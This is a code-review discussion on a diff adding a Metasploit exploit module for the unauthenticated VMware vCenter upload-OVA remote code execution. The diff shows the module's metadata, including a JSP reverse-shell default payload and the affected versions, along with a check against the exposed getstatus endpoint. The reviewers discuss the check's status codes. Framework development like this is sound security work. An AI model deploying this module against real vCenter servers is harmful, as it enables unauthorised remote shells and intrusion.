modules/exploits/multi/http/vmware_vcenter_uploadova_rce.rb

```diff
@@ -0,0 +1,224 @@
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'],
+          ['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'],
+          ['URL', 'https://twitter.com/jas502n/status/1364810720261496843'],
+          ['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'],
+          ['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'],
+          ['URL', 'https://kb.vmware.com/s/article/2143838'],
+          ['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html']
+        ],
+        'DisclosureDate' => '2021-02-23', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Platform' => ['linux', 'win'],
+        'Arch' => ARCH_JAVA,
+        'Privileged' => false, # true on Windows
+        'Targets' => [
+          [
+            # TODO: /home/vsphere-ui/.ssh/authorized_keys
+            'VMware vCenter Server <= 6.7 Update 1b (Linux)',
+            {
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'VMware vCenter Server <= 6.7 Update 3j (Windows)',
+            {
+              'Platform' => 'win'
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint']
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+
+    register_advanced_options([
+      # /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index>
+      OptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me
+      OptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu
+    ])
+  end
+
+  def spray_and_pray_min
+    datastore['SprayAndPrayMin']
+  end
+
+  def spray_and_pray_max
+    datastore['SprayAndPrayMax']
+  end
+
+  def spray_and_pray_range
+    (spray_and_pray_min..spray_and_pray_max).to_a
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus')
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    # {"States":"[]","Install Progress":"UNKNOWN","Config Progress":"UNKNOWN","Config Final Progress":"UNKNOWN","Install Final Progress":"UNKNOWN"}
+    expected_keys = [
+      'States',
+      'Install Progress',
+      'Install Final Progress',
+      'Config Progress',
+      'Config Final Progress'
+    ]
+
+    unless res.code == 200 && (expected_keys & res.get_json_document.keys) == expected_keys
+      return CheckCode::Safe('Unauthenticated endpoint access denied.')
+    end
```

Comment:
While testing this and waiting for the service to come up I was getting this condition from a 200 OK because the expected keys weren't present. The message that the endpoint responded with access denied was confusing me when I had `HttpTrace` on. I would suggest breaking this out a bit more like:

```suggestion
    if res.code == 401
      return CheckCode::Safe('Unauthenticated endpoint access denied.')
    elsif res.code != 200 || (expected_keys & res.get_json_document.keys) != expected_keys
      return CheckCode::Safe('The endpoint does not appear vulnerable.')
    end
```

Reply:
My bad. I was emulating another check I wrote, which isn't capable of the same granularity. I've had `401` confirmed as a patched response, so let me update that.

Reply:
Updated and refactored.